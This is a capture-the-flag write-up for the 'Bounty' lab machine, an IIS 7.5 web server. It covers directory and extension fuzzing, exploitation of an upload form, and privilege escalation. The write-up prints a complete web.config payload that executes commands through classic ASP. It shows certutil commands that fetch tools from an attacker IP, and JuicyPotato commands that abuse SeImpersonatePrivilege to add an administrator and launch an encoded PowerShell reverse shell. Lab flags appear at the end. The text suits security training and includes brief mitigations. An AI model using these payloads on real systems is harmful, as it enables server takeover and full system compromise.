Bounty

Recon

nmap_scan.log
Open 10.129.97.182:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.97.182

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (80)

Writeup.png
└─$ curl http://10.129.97.182/merlin.jpg -Os
└─$ file merlin.jpg
merlin.jpg: JPEG image data, JFIF standard 1.02, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS4 Windows, datetime=2012:03:20 00:51:07], baseline, precision 8, 2000x2000, components 3

The backend is IIS 7.5, i.e. Windows Server 2008 R2 / Windows 7 era, so the usual ASP.NET / classic ASP handler set is in play.

Writeup-1.png

Browsing to the discovered directories gives 403 - Forbidden: Access is denied (directory browsing is disabled, but the paths exist).

└─$ feroxbuster -u 'http://10.129.97.182/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
301      GET        2l       10w      158c http://10.129.97.182/aspnet_client => http://10.129.97.182/aspnet_client/
301      GET        2l       10w      158c http://10.129.97.182/uploadedfiles => http://10.129.97.182/uploadedfiles/
200      GET     1624l    16517w  1403476c http://10.129.97.182/merlin.jpg
200      GET       32l       53w      630c http://10.129.97.182/
301      GET        2l       10w      158c http://10.129.97.182/uploadedFiles => http://10.129.97.182/uploadedFiles/
301      GET        2l       10w      158c http://10.129.97.182/UploadedFiles => http://10.129.97.182/UploadedFiles/
301      GET        2l       10w      158c http://10.129.97.182/Aspnet_client => http://10.129.97.182/Aspnet_client/
301      GET        2l       10w      158c http://10.129.97.182/aspnet_Client => http://10.129.97.182/aspnet_Client/
301      GET        2l       10w      169c http://10.129.97.182/aspnet_client/system_web => http://10.129.97.182/aspnet_client/system_web/
301      GET        2l       10w      158c http://10.129.97.182/ASPNET_CLIENT => http://10.129.97.182/ASPNET_CLIENT/
301      GET        2l       10w      169c http://10.129.97.182/Aspnet_client/system_web => http://10.129.97.182/Aspnet_client/system_web/
301      GET        2l       10w      169c http://10.129.97.182/aspnet_Client/system_web => http://10.129.97.182/aspnet_Client/system_web/
301      GET        2l       10w      169c http://10.129.97.182/ASPNET_CLIENT/system_web => http://10.129.97.182/ASPNET_CLIENT/system_web/

The case variants (uploadedfiles / uploadedFiles / UploadedFiles) are the same directory, since IIS paths on NTFS are case-insensitive. Next, fuzz for file extensions: the web server is IIS, so it is probably serving ASP or ASPX files.

└─$ feroxbuster -u 'http://10.129.97.182/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -n -x asp,aspx
301      GET        2l       10w      158c http://10.129.97.182/aspnet_client => http://10.129.97.182/aspnet_client/
200      GET     1624l    16517w  1403476c http://10.129.97.182/merlin.jpg
200      GET       32l       53w      630c http://10.129.97.182/
200      GET       22l       58w      941c http://10.129.97.182/transfer.aspx
301      GET        2l       10w      158c http://10.129.97.182/uploadedfiles => http://10.129.97.182/uploadedfiles/

Upload Form

Uploading a JPG worked, but an ASPX did not.

Writeup-2.png

Fuzzing the extension with the /usr/share/seclists/Discovery/Web-Content/web-extensions.txt wordlist returns no valid result; it looks like only images are valid (?)

Writeup-3.png

*.aspx files return a different response 🤔

Writeup-4.png

web.config RCE

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services#execute-.config-files

We are able to upload *.config files. That is enough for code execution: IIS reads a web.config found in any directory under the site, and a web.config can register its own handler mapping. A web.config that maps *.config to the classic ASP engine (asp.dll) and carries ASP code after the XML is therefore executed as soon as it is requested from the upload directory.

Writeup-5.png
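As an added example (not from the original writeup), this is the web.config payload the linked technique describes. The XML part registers *.config as a classic ASP handler and removes the two request-filtering rules that would otherwise refuse to serve the file; the ASP part sits in an XML comment after the root element, so the config reader still parses the file, while asp.dll executes the `<% %>` block when the file is requested. The command (`cmd.exe /c whoami`) and the target upload directory are assumptions for illustration.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <!-- Map *.config (this file included) to classic ASP so IIS executes it -->
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- Request filtering denies .config and the web.config segment by default; undo both -->
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- Everything below is a comment to the XML config reader but live code to asp.dll.
     Nothing inside this comment may contain two consecutive dashes or the XML breaks. -->
<!--
<%
' Assumed command for illustration; a reverse shell (powershell -e <base64>) fits here
' because base64 never contains a dash.
Set sh = CreateObject("WScript.Shell")
Set p = sh.Exec("cmd.exe /c whoami")
Response.Write(p.StdOut.ReadAll())
%>
-->
```

Upload it under the name web.config through transfer.aspx and request http://10.129.97.182/UploadedFiles/web.config; the command output appears after the echoed configuration text. Two caveats: preCondition="bitness64" matches a 64-bit application pool, so drop that attribute if the pool runs 32-bit; and the no-double-dash rule applies to the payload as well as to comments. On the defensive side this works only because the upload directory lives under the web root and inherits script execution: allow-listing upload extensions, storing uploads outside wwwroot, and locking the handlers section in applicationHost.config (overrideModeDefault="Deny") so a subdirectory web.config cannot register handlers each close it off.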

Reverse Shell (merlin)

Get a reverse shell through the uploaded web.config; the command executed is an encoded PowerShell one-liner:

powershell -e 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
PS C:\Users\merlin> whoami /all

User Name     SID
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000

Group Name                           Type             SID                                                           Attributes
==================================== ================ ============================================================= ==================================================
Everyone                             Well-known group S-1-1-0                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                  Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                                       Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool           Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                  Mandatory group, Enabled by default, Enabled group

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Privilege Escalation

SeImpersonatePrivilege stands out: it is enabled for the application pool identity, and it is exactly what the Potato family abuses. On this OS generation (IIS 7.5, so Server 2008 R2 / Windows 7) JuicyPotato still works; it stops working on Windows 10 1809 / Server 2019 and later. Keep in mind that it spawns a new process with a SYSTEM token rather than elevating the current shell, so the payload should be something that gives you a usable session directly, which matters here because only port 80 is exposed and there is no other login path.

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege

Because dotnet isn't installed, I think that's why efs kept failing.

PS C:\inetpub\wwwroot\UploadedFiles> certutil.exe -urlcache -f http://10.10.14.99/efs.exe efs.exe

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato
https://github.com/ohpe/juicy-potato
https://github.com/ohpe/juicy-potato/releases/tag/v0.1

└─$ curl -LOs https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
---
PS C:\Users\merlin\Music> certutil.exe -urlcache -f http://10.10.14.99/JuicyPotato.exe jp.exe
PS C:\Users\merlin\Music> C:\Users\merlin\Music\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\windows\system32\cmd.exe -a "/c net localgroup administrators merlin /add" -t *

Adding this user to Administrators yielded no success, for whatever reason.

A reverse shell seemed like too much overhead, but I ended up doing it.

PS C:\Users\merlin\Music> where.exe powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PS C:\Users\merlin\Music> C:\Users\merlin\Music\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -a "-e 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" -t *

Flags

PS C:\> ls /Users -fil *.txt -rec | %{$_.FullName;echo " ";cat $_.FullName}
C:\Users\Administrator\Desktop\root.txt

4a3637f74b0596935c1af382ab8255d4
PS C:\> cat /Users/merlin/Desktop/user.txt
03b2a8d84060db27d39bfc331013b65c

Note: user.txt is a hidden file, which is why the recursive listing above only found root.txt. Add -Force to Get-ChildItem to include hidden files, but that also lists every other hidden file.
